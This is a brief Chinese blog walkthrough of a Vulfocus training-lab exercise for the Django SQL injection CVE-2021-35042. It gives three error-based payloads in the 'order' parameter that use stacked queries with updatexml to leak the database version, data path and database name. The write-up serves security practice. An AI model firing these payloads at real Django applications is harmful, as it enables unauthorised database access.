Go教程

Vulfocus靶场 | Django SQL注入(CVE-2021-35042)

本文主要是介绍Vulfocus靶场 | Django SQL注入(CVE-2021-35042),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

漏洞复现

这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\

 

直接按照提示,进入了Django报错页面

 

flag就在里面,直接ctrl+F就能找到

 

 

爆数据库版本

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%23

 

爆路径

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@datadir)),1)%23

 

 

数据库名

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select database())),1)%23

 

 

 

这篇关于Vulfocus靶场 | Django SQL注入(CVE-2021-35042)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!